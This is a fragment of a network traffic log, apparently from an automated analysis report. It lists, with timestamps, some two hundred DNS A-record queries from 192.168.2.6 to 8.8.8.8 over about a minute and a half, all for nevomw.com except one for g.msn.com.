                                            Dec 2, 2020 11:54:32.825603962 CET53567168.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:33.233997107 CET5662553192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:33.261178970 CET53566258.8.8.8192.168.2.6
                                            Dec 2, 2020 11:54:33.669555902 CET5589753192.168.2.68.8.8.8
                                            Dec 2, 2020 11:54:33.696609020 CET53558978.8.8.8192.168.2.6

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                            Dec 2, 2020 11:52:41.218013048 CET192.168.2.68.8.8.80x1c2aStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:41.767638922 CET192.168.2.68.8.8.80xf17aStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:42.105349064 CET192.168.2.68.8.8.80x597Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:42.570950985 CET192.168.2.68.8.8.80xb42cStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:43.039609909 CET192.168.2.68.8.8.80x5e0bStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:43.673294067 CET192.168.2.68.8.8.80xd940Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:44.272181034 CET192.168.2.68.8.8.80x377cStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:44.716902018 CET192.168.2.68.8.8.80x2af8Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:45.576247931 CET192.168.2.68.8.8.80x74b6Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:46.081265926 CET192.168.2.68.8.8.80xf5b6Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:47.086719990 CET192.168.2.68.8.8.80x6d5aStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:47.525657892 CET192.168.2.68.8.8.80x42cdStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:47.956501961 CET192.168.2.68.8.8.80xa47cStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:48.383275032 CET192.168.2.68.8.8.80xc78bStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:48.786987066 CET192.168.2.68.8.8.80x73abStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:49.203802109 CET192.168.2.68.8.8.80x559cStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:49.659370899 CET192.168.2.68.8.8.80x5065Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:50.093799114 CET192.168.2.68.8.8.80x33c8Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:50.534687996 CET192.168.2.68.8.8.80x27ddStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:50.974617958 CET192.168.2.68.8.8.80x19b1Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:51.391402960 CET192.168.2.68.8.8.80x942bStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:51.891607046 CET192.168.2.68.8.8.80x6e91Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:52.391201973 CET192.168.2.68.8.8.80xc7adStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:52.787806034 CET192.168.2.68.8.8.80x7f49Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:53.241023064 CET192.168.2.68.8.8.80xca0Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:53.685561895 CET192.168.2.68.8.8.80x8644Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:54.084891081 CET192.168.2.68.8.8.80x492cStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:54.560220957 CET192.168.2.68.8.8.80xe04aStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:55.011075020 CET192.168.2.68.8.8.80xfb94Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:55.415225983 CET192.168.2.68.8.8.80xb63aStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:55.873862982 CET192.168.2.68.8.8.80x517Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:56.396317005 CET192.168.2.68.8.8.80x8eeeStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:56.770127058 CET192.168.2.68.8.8.80x5753Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:57.169342041 CET192.168.2.68.8.8.80x222cStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:57.657506943 CET192.168.2.68.8.8.80x1643Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:58.035134077 CET192.168.2.68.8.8.80x4cfbStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:58.479775906 CET192.168.2.68.8.8.80xe14cStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:58.879780054 CET192.168.2.68.8.8.80x1d80Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:59.275832891 CET192.168.2.68.8.8.80xec8dStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:59.678181887 CET192.168.2.68.8.8.80xa247Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:00.166532040 CET192.168.2.68.8.8.80x849fStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:00.558366060 CET192.168.2.68.8.8.80xd9e7Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:00.962841988 CET192.168.2.68.8.8.80xd1a0Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:01.440953970 CET192.168.2.68.8.8.80xa8eStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:01.910465002 CET192.168.2.68.8.8.80xc733Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:02.286391020 CET192.168.2.68.8.8.80x7c06Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:02.878704071 CET192.168.2.68.8.8.80x14e8Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:03.308295965 CET192.168.2.68.8.8.80x4814Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:04.113468885 CET192.168.2.68.8.8.80xeedaStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:05.247956038 CET192.168.2.68.8.8.80xe9c5Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:05.641532898 CET192.168.2.68.8.8.80x6d9fStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:06.013871908 CET192.168.2.68.8.8.80xa6d0Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:06.460585117 CET192.168.2.68.8.8.80x8c0cStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:06.890744925 CET192.168.2.68.8.8.80xb320Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:07.282875061 CET192.168.2.68.8.8.80xe178Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:07.757424116 CET192.168.2.68.8.8.80x82e7Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:08.224451065 CET192.168.2.68.8.8.80xf1edStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:09.288620949 CET192.168.2.68.8.8.80xf1edStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:10.472949982 CET192.168.2.68.8.8.80x886eStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:10.939058065 CET192.168.2.68.8.8.80x2363Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:11.357434034 CET192.168.2.68.8.8.80xa1bStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:11.856349945 CET192.168.2.68.8.8.80xf955Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:12.288547993 CET192.168.2.68.8.8.80x2df6Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:12.675846100 CET192.168.2.68.8.8.80x73eeStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:13.154231071 CET192.168.2.68.8.8.80x9cdcStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:13.602885008 CET192.168.2.68.8.8.80x2134Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:14.028386116 CET192.168.2.68.8.8.80x49d1Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:14.418385029 CET192.168.2.68.8.8.80x2017Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:14.831980944 CET192.168.2.68.8.8.80x3baaStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:15.284384966 CET192.168.2.68.8.8.80xe4e5Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:15.667623997 CET192.168.2.68.8.8.80x31d0Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:16.030819893 CET192.168.2.68.8.8.80x7094Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:16.411999941 CET192.168.2.68.8.8.80xfbc6Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:16.780730963 CET192.168.2.68.8.8.80x7453Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:17.151694059 CET192.168.2.68.8.8.80x4184Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:17.514981985 CET192.168.2.68.8.8.80xe1eStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:17.956578970 CET192.168.2.68.8.8.80x986bStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:18.336477995 CET192.168.2.68.8.8.80x6920Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:18.710259914 CET192.168.2.68.8.8.80x4b5Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:19.234713078 CET192.168.2.68.8.8.80xfce1Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:19.627461910 CET192.168.2.68.8.8.80x2f7Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:19.864814997 CET192.168.2.68.8.8.80x5b32Standard query (0)g.msn.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:20.131280899 CET192.168.2.68.8.8.80x769fStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:20.728956938 CET192.168.2.68.8.8.80xa7f3Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:21.179210901 CET192.168.2.68.8.8.80x8802Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:21.933065891 CET192.168.2.68.8.8.80x1cc5Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:23.109603882 CET192.168.2.68.8.8.80x44beStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:23.515954018 CET192.168.2.68.8.8.80xac3Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:23.884077072 CET192.168.2.68.8.8.80xc754Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:24.321515083 CET192.168.2.68.8.8.80x578fStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:24.746162891 CET192.168.2.68.8.8.80x2c4Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:25.162528038 CET192.168.2.68.8.8.80x78edStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:25.535120010 CET192.168.2.68.8.8.80x35c3Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:25.947319984 CET192.168.2.68.8.8.80x95cdStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:26.361608982 CET192.168.2.68.8.8.80x885bStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:26.781534910 CET192.168.2.68.8.8.80xae0fStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:27.201503992 CET192.168.2.68.8.8.80x63d9Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:27.631100893 CET192.168.2.68.8.8.80xf26cStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:28.056104898 CET192.168.2.68.8.8.80xa306Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:28.488528967 CET192.168.2.68.8.8.80x8c46Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:28.910182953 CET192.168.2.68.8.8.80xe388Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:29.335936069 CET192.168.2.68.8.8.80xedd5Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:29.746006012 CET192.168.2.68.8.8.80xb4dcStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:30.157058954 CET192.168.2.68.8.8.80xb5b0Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:30.534432888 CET192.168.2.68.8.8.80x716dStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:30.950144053 CET192.168.2.68.8.8.80x3e73Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:31.414361000 CET192.168.2.68.8.8.80x516aStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:31.786268950 CET192.168.2.68.8.8.80x2781Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:32.222188950 CET192.168.2.68.8.8.80x817fStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:32.588006020 CET192.168.2.68.8.8.80xfeeStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:33.002825975 CET192.168.2.68.8.8.80x6d88Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:33.441160917 CET192.168.2.68.8.8.80x7b98Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:33.848555088 CET192.168.2.68.8.8.80xd989Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:34.279545069 CET192.168.2.68.8.8.80xe9d9Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:34.717075109 CET192.168.2.68.8.8.80x52bcStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:35.146568060 CET192.168.2.68.8.8.80x3eeStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:35.539638042 CET192.168.2.68.8.8.80x97e8Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:35.924839973 CET192.168.2.68.8.8.80x2578Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:36.347860098 CET192.168.2.68.8.8.80x309aStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:36.785064936 CET192.168.2.68.8.8.80xa809Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:37.224658012 CET192.168.2.68.8.8.80xd848Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:37.669658899 CET192.168.2.68.8.8.80xf248Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:38.092999935 CET192.168.2.68.8.8.80x48f6Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:38.512728930 CET192.168.2.68.8.8.80xfe47Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:38.875746965 CET192.168.2.68.8.8.80xc8e2Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:39.301574945 CET192.168.2.68.8.8.80xfe89Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:39.725230932 CET192.168.2.68.8.8.80x6fc5Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:40.219691038 CET192.168.2.68.8.8.80x392fStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:40.580743074 CET192.168.2.68.8.8.80x85eStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:41.038954973 CET192.168.2.68.8.8.80x9a85Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:41.423147917 CET192.168.2.68.8.8.80x5e69Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:41.821149111 CET192.168.2.68.8.8.80x2f9aStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:42.263540030 CET192.168.2.68.8.8.80xa075Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:44.639374018 CET192.168.2.68.8.8.80xd470Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:45.021672964 CET192.168.2.68.8.8.80x6e0aStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:45.443512917 CET192.168.2.68.8.8.80xf72cStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:45.885236025 CET192.168.2.68.8.8.80x8decStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:46.304502964 CET192.168.2.68.8.8.80xe962Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:46.728537083 CET192.168.2.68.8.8.80xd3f1Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:47.133272886 CET192.168.2.68.8.8.80xc1ebStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:47.572877884 CET192.168.2.68.8.8.80x690aStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:47.995712996 CET192.168.2.68.8.8.80xa50Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:48.408747911 CET192.168.2.68.8.8.80x1b9bStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:48.832439899 CET192.168.2.68.8.8.80x494bStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:49.251580000 CET192.168.2.68.8.8.80x291dStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:49.627768993 CET192.168.2.68.8.8.80x2409Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:50.035084009 CET192.168.2.68.8.8.80xec53Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:50.434282064 CET192.168.2.68.8.8.80x9c3aStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:50.894686937 CET192.168.2.68.8.8.80x799fStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:51.414562941 CET192.168.2.68.8.8.80xcf48Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:51.783464909 CET192.168.2.68.8.8.80xcd04Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:52.171829939 CET192.168.2.68.8.8.80x3126Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:52.585572958 CET192.168.2.68.8.8.80xa957Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:53.006575108 CET192.168.2.68.8.8.80x455Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:53.381268024 CET192.168.2.68.8.8.80x37f3Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:53.810909986 CET192.168.2.68.8.8.80x3db8Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:54.208628893 CET192.168.2.68.8.8.80xe762Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:54.629021883 CET192.168.2.68.8.8.80x9e82Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:55.050055027 CET192.168.2.68.8.8.80x58deStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:55.423598051 CET192.168.2.68.8.8.80xb965Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:55.850387096 CET192.168.2.68.8.8.80xdae0Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:56.248869896 CET192.168.2.68.8.8.80xad39Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:56.647577047 CET192.168.2.68.8.8.80x7da5Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:57.027770042 CET192.168.2.68.8.8.80x4cd8Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:57.430881977 CET192.168.2.68.8.8.80x1880Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:57.886060953 CET192.168.2.68.8.8.80x648cStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:58.272211075 CET192.168.2.68.8.8.80x514cStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:58.649456024 CET192.168.2.68.8.8.80xba0dStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:59.079360962 CET192.168.2.68.8.8.80x90cStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:59.472974062 CET192.168.2.68.8.8.80xbdf9Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:59.913703918 CET192.168.2.68.8.8.80x6ecbStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:00.307252884 CET192.168.2.68.8.8.80xa4edStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:00.705884933 CET192.168.2.68.8.8.80x49b8Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:01.120301008 CET192.168.2.68.8.8.80x1f48Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:01.509221077 CET192.168.2.68.8.8.80x6a03Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:01.956480980 CET192.168.2.68.8.8.80x917eStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:02.397713900 CET192.168.2.68.8.8.80xb219Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:02.774084091 CET192.168.2.68.8.8.80xedd8Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:03.318240881 CET192.168.2.68.8.8.80x3075Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:03.729955912 CET192.168.2.68.8.8.80x441eStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:04.140897989 CET192.168.2.68.8.8.80xcf0fStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:04.599097967 CET192.168.2.68.8.8.80xd7c9Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:04.985646963 CET192.168.2.68.8.8.80x70ffStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:05.616873026 CET192.168.2.68.8.8.80xc671Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:06.028312922 CET192.168.2.68.8.8.80x5979Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:06.426261902 CET192.168.2.68.8.8.80xc8aaStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:06.822459936 CET192.168.2.68.8.8.80x2a0fStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:07.286889076 CET192.168.2.68.8.8.80x3c98Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:07.661478996 CET192.168.2.68.8.8.80x5e6Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:08.032965899 CET192.168.2.68.8.8.80x1ca3Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:08.417562962 CET192.168.2.68.8.8.80xc7adStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:08.915608883 CET192.168.2.68.8.8.80xc810Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:09.930711985 CET192.168.2.68.8.8.80xd073Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:11.526834011 CET192.168.2.68.8.8.80x49bfStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:11.984951019 CET192.168.2.68.8.8.80x7151Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:12.548167944 CET192.168.2.68.8.8.80x788dStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:12.928486109 CET192.168.2.68.8.8.80xc0fbStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:13.366381884 CET192.168.2.68.8.8.80x2adaStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:13.817374945 CET192.168.2.68.8.8.80xa6cdStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:14.184145927 CET192.168.2.68.8.8.80xf369Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:14.635570049 CET192.168.2.68.8.8.80x1aa4Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:15.045031071 CET192.168.2.68.8.8.80x2b15Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:15.459170103 CET192.168.2.68.8.8.80xf9e6Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:15.820738077 CET192.168.2.68.8.8.80x67f5Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:16.267661095 CET192.168.2.68.8.8.80x7c0bStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:16.631093979 CET192.168.2.68.8.8.80x8ff2Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:17.072542906 CET192.168.2.68.8.8.80xc015Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:17.425602913 CET192.168.2.68.8.8.80x9eb2Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:17.846313953 CET192.168.2.68.8.8.80xd2f4Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:18.235343933 CET192.168.2.68.8.8.80x6bdbStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:18.702311039 CET192.168.2.68.8.8.80x2475Standard query (0)nevomw.comA (IP address)IN (0x0001)
